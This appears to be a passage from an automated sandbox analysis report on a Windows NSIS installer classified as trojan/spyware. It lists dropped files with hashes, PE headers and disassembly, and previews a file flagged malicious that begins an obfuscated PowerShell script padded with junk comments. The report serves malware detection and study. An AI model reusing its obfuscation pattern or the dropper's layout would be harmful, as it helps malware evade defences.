                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@54/21@5/39
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded IPs from analysis (whitelisted): 23.221.242.90
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: file.exe
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe5740021, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7864532229988107
                          Encrypted:false
                          SSDEEP:
                          MD5:6601A1B69DF7285DE1CFD02D02D1409F
                          SHA1:CE51EB94BAA3B52AC5ACC73AD643CF697BD24425
                          SHA-256:33BB6AE81704C0FEC08CB99354BD106A289550B9E9C3CA6D6CA7FAC80F5DCB3D
                          SHA-512:8359DA598D4A7E6F8D55B99756024803BD1FC49A4594D7F75BA0CF22868985A8465C521E2079E49F7B970782D4225117F2AAC3220704E59B4F62627FE031B3B9
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8003
                          Entropy (8bit):4.838950934453595
                          Encrypted:false
                          SSDEEP:
                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:unknown
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):229376
                          Entropy (8bit):0.6434285179750744
                          Encrypted:false
                          SSDEEP:
                          MD5:CA2638E4884BBF9BF114A2362BDF7166
                          SHA1:6C7D4FBE6FD32EDD6B9246D42C03EAF9B0444677
                          SHA-256:3DA02AD760D44C75B4B4768E246C6C6FA60330AB0B2D155C9A9F21E3F65613C1
                          SHA-512:AAAA94AA819B3628C7DAEF6309C0C795215B8FADE93003C48C4D570B3B58E31B5312D3FD94799C6216E138CA41A04CF5E0CB45D99EDF2C4864195398783030B9
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):294912
                          Entropy (8bit):0.08428064428500968
                          Encrypted:false
                          SSDEEP:
                          MD5:BDD416B4CDA202FBECDA64E322383E0A
                          SHA1:9648E083239C643A03D024CF42D06FEBCCFC3989
                          SHA-256:7EF6BD5E3293949D174DBC2BFD59E9DEE3811CE5B01BAB894A8E0AA4BA6DE936
                          SHA-512:D75E0D4B239844293C9CE4980F9FC1665247EF6F21C0D6D4B299F29A5A3800AD44E9B0B1D5FF5BC9CB3EB86F6394D1AA7F86845A54FC4B8A937CDF5DA619324F
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):5242880
                          Entropy (8bit):0.037864444196155034
                          Encrypted:false
                          SSDEEP:
                          MD5:B612FC06C34BEEBCC6EA05BDE1DCC9F4
                          SHA1:1F08BDF75A2CBC40FD342A24D99A7075648C431D
                          SHA-256:79F8BB304FA31A232F0BDA8B07B9CB87C58EBF67085B88077C2C73554E31C2C2
                          SHA-512:7AB95F0AB92A5A518D1D5920E4F8E9CEEA55DD9B3FDE9B844D37558F1EDD83ADB58177B07E508DA0A211787BD2B8ABFCDA907E7FBB0C44B957292DC549C86B73
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):0.08235737944063153
                          Encrypted:false
                          SSDEEP:
                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.6732424250451717
                          Encrypted:false
                          SSDEEP:
                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.8486279078348049
                          Encrypted:false
                          SSDEEP:
                          MD5:975EB5A66B745A4E80F115C4E014A785
                          SHA1:5E06CC0DD91C0D9B5FA9F446175EAA2E72E20172
                          SHA-256:49CC538CF3E5B29BCE4D7D2905042BA38571947AC433BEBDEF58B43874BA84D3
                          SHA-512:AF3DA4A55F599595696FB869F23A77010C7009E8832E260A0B70271EA41DFCFE3371D3FAB39B60DF1B274E1085862D39AA6388937DADB1F12F5323C0513A5721
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):40960
                          Entropy (8bit):0.8553638852307782
                          Encrypted:false
                          SSDEEP:
                          MD5:28222628A3465C5F0D4B28F70F97F482
                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.37202887060507356
                          Encrypted:false
                          SSDEEP:
                          MD5:4D950F6445B3766514BA266D6B1F3325
                          SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
                          SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
                          SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.3528485475628876
                          Encrypted:false
                          SSDEEP:
                          MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                          SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                          SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                          SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:modified
                          Size (bytes):196608
                          Entropy (8bit):1.1216922126537057
                          Encrypted:false
                          SSDEEP:
                          MD5:7F784E8E9051D8E70834C231AE5CC670
                          SHA1:FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1
                          SHA-256:1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
                          SHA-512:A054A1E0F3289F4CCD25F01A81C0B3471A2CA8243E76ADD24D105A4141FBC534D20CE913A796474FB17754AB3B87C56679B8962FB860060B23F467601043EEA7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):51200
                          Entropy (8bit):0.8746135976761988
                          Encrypted:false
                          SSDEEP:
                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):106496
                          Entropy (8bit):1.1371512776121733
                          Encrypted:false
                          SSDEEP:
                          MD5:46A8B7CD1CB434A5C8CE3CF3C7825DD9
                          SHA1:518804A81A13456A077723A4384FBD2E20EFD1BF
                          SHA-256:9E18C03AD835DCA2E633226FDA3D0DE1FA4B46D9AAAA80FCA6D79FF4EC296B76
                          SHA-512:86B5DFAAF334756E422847DD33DB7CC4CCE68A7C817F9523F0976F57357B0A1D156C53886F1BA99EEA9375FBF10E08246EE8EFB7CFAD7D092B888EE7F85F5BD7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):159744
                          Entropy (8bit):0.5394293526345721
                          Encrypted:false
                          SSDEEP:
                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):155648
                          Entropy (8bit):0.5407252242845243
                          Encrypted:false
                          SSDEEP:
                          MD5:7B955D976803304F2C0505431A0CF1CF
                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1245
                          Entropy (8bit):5.462849750105637
                          Encrypted:false
                          SSDEEP:
                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                          Malicious:false
                          Reputation:unknown
                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):342576
                          Entropy (8bit):7.62696842529225
                          Encrypted:false
                          SSDEEP:
                          MD5:8817ABE755D6155C0CE5F1C47ED41304
                          SHA1:2696075A18D76B6730BCCC14AF891DE3EAC88C5D
                          SHA-256:DBFBB6848571304DC04BEC19EF733105388887EDA1DC52C7DBB605815B67C9AC
                          SHA-512:207B37C95C2F659466A041C8317DCA557558BEE46DFBA8D2514C86DA8B2950423CE739964B7CFB896D46D99BE08FC0257985DC9E98C48AB5C7E0B3D8A7EE84DF
                          Malicious:false
                          Reputation:unknown
                          Preview:........ppp.11.jj.....m......."""..........JJ......R.mm.E.....===......C...../.....................................555............E..........X...D..NN.......oo......SS............9.......................&.......==.N.&&&&&...00.'.........._..........................%%%...3..RR.................8..HH..\\....................ww.......CC...444....ZZZZ.??........3.?.CCC.................].^^^.....................n......>.j......?......... ........AAA..........l......A..R....dd.......................A..................................!!................f..........................ee........-.c...............$$..^....ooo......+...O..M..;;..D........I....... .bb.....<<........................V....................8..................<<<..i....A.................D..........A...................................$$$$....2..k.]........................;.....q....9.M..............??......||......ii..B.........11111.......R.........__......................NN.**.......w....................x.......\...........
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with very long lines (60465), with no line terminators
                          Category:dropped
                          Size (bytes):60465
                          Entropy (8bit):5.3309906174569255
                          Encrypted:false
                          SSDEEP:
                          MD5:32C7272D1BC1F9F0AF8AF047E4F2732C
                          SHA1:52F89038555C67A8FCDD6F415F0951990ED01ABB
                          SHA-256:A6FFF8637295C331DFC91CE1686C05030AA64AD94538B8CDC29AE58F4DCDE34C
                          SHA-512:AAD99BDB99F92972BD75AA6DCB6E35BB77AF22F5435AEA460AFE943819D559699102589FBDB0ACA2D05FE003B03677AF5EB6E46513FF7225F0DD6C3F3EA4741A
                          Malicious:true
                          Reputation:unknown
                          Preview:$Espousal=$Interceptorborterer;<#ekviperinger Thingumadoodle Assized Overexcited #><#Elucidator Firetiden Velmente Misforstaaende Koreografer basos #><#Haremmers holosericeous Gainspeaker Jordemodertasker Ateleiosis Bache Kythes #><#Loranstationernes Levnedsmidlet Jernbanens Reaward Nighness Bloodless adoptivfader #><#Wong Puffet Taxiable Lithonephrotomy Husplaners Seership konomiklasses #><#Vigilantist Blyantstift unappropriation Hudstryg Aromatisering Eskadreflyvningerne whiggification #><#Nissers Weatherglass enroll Tilslutningspligt Omegnene Flyttegods Nonsane #><#melchora Freesias Fjerntliggendes Underleverandr #><#Tematiks Blddelsskaderne Rilles Eylevs Kolonnaders #><#Storeship Complexive Knhjder #><#Syditalien Trained Predestination #><#Opbakningers Paraguayanernes Boleweed guanases Ruternes Unsainted #><#Anraab Planetoidal Takujui Trocars #><#Encefalo Laccin Coincorporate Samech Townmen Rhabdopleura #><#Forskydeliges Retractor Siemens Mabonmamodron Pernitnes #><#Fluorometry Ram
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.347225525195404
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 92.16%
                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:443'972 bytes
                          MD5:afaedf2ff4dc43d62b33b003a1a501ab
                          SHA1:9efe783f2dace329faa38ecefe77b6359dab3bd8
                          SHA256:1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422
                          SHA512:2ec266dfd5e72123f000867980d925d16ffad858e8a9cf0650d67f97d111042b31720012dc03dcfb4c84017f7b2a51c984f0381132f3e9f8daab5a3b8eb98b75
                          SSDEEP:6144:C+K0etCRRspiYJIzlMwSGORbLAS2P/RBNBaOkqWs76w43bh1av8:LbRExcSRGrS2P/RBna7s7XSV
                          TLSH:8694F051F2D08897E41212B55C37EA352267FD1DA330563F226A7BE919733B320AB94F
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L......Q.................\...........0.......p....@
                          Icon Hash:1c66d3c8721d0922
                          Entrypoint:0x4030dc
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x51E30582 [Sun Jul 14 20:09:38 2013 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                          Instruction
                          sub esp, 00000184h
                          push ebx
                          push ebp
                          push esi
                          xor ebx, ebx
                          push edi
                          mov dword ptr [esp+18h], ebx
                          mov dword ptr [esp+10h], 00409190h
                          mov dword ptr [esp+20h], ebx
                          mov byte ptr [esp+14h], 00000020h
                          call dword ptr [00407034h]
                          push 00008001h
                          call dword ptr [004070B0h]
                          push ebx
                          call dword ptr [0040728Ch]
                          push 00000008h
                          mov dword ptr [00423F78h], eax
                          call 00007FE08D1D98E8h
                          mov dword ptr [00423EC4h], eax
                          push ebx
                          lea eax, dword ptr [esp+38h]
                          push 00000160h
                          push eax
                          push ebx
                          push 0041F480h
                          call dword ptr [00407164h]
                          push 00409180h
                          push 004236C0h
                          call 00007FE08D1D9592h
                          call dword ptr [0040711Ch]
                          mov ebp, 00429000h
                          push eax
                          push ebp
                          call 00007FE08D1D9580h
                          push ebx
                          call dword ptr [00407114h]
                          cmp byte ptr [00429000h], 00000022h
                          mov dword ptr [00423EC0h], eax
                          mov eax, ebp
                          jne 00007FE08D1D6B7Ch
                          mov byte ptr [esp+14h], 00000022h
                          mov eax, 00429001h
                          push dword ptr [esp+14h]
                          push eax
                          call 00007FE08D1D902Dh
                          push eax
                          call dword ptr [00407220h]
                          mov dword ptr [esp+1Ch], eax
                          jmp 00007FE08D1D6C35h
                          cmp cl, 00000020h
                          jne 00007FE08D1D6B78h
                          inc eax
                          cmp byte ptr [eax], 00000020h
                          je 00007FE08D1D6B6Ch
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33000 | 0x17ca8 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x5a6c | 0x5c00 | 1c619949741a76b63a54c1e6c4d6b2f8 | False | 0.6611328125 | data | 6.414702071136453 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata | 0x7000 | 0x11ce | 0x1200 | 6c31e0693072284f258d2c4a271de506 | False | 0.4524739583333333 | OpenPGP Secret Key | 5.236327486414569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x9000 | 0x1afb8 | 0x400 | 78f5760d9fafb71fdbc88c3497afef46 | False | 0.599609375 | data | 4.86113722933255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata | 0x24000 | 0xf000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x33000 | 0x17ca8 | 0x17e00 | 25adf7ace9c240327e220639de0ef340 | False | 0.1678358147905759 | data | 3.220423442186396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_BITMAP | 0x33400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                          RT_ICON | 0x33768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.12634567609132852
                          RT_ICON | 0x43f90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.2349585062240664
                          RT_ICON | 0x46538 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.29362101313320826
                          RT_ICON | 0x475e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.20575692963752665
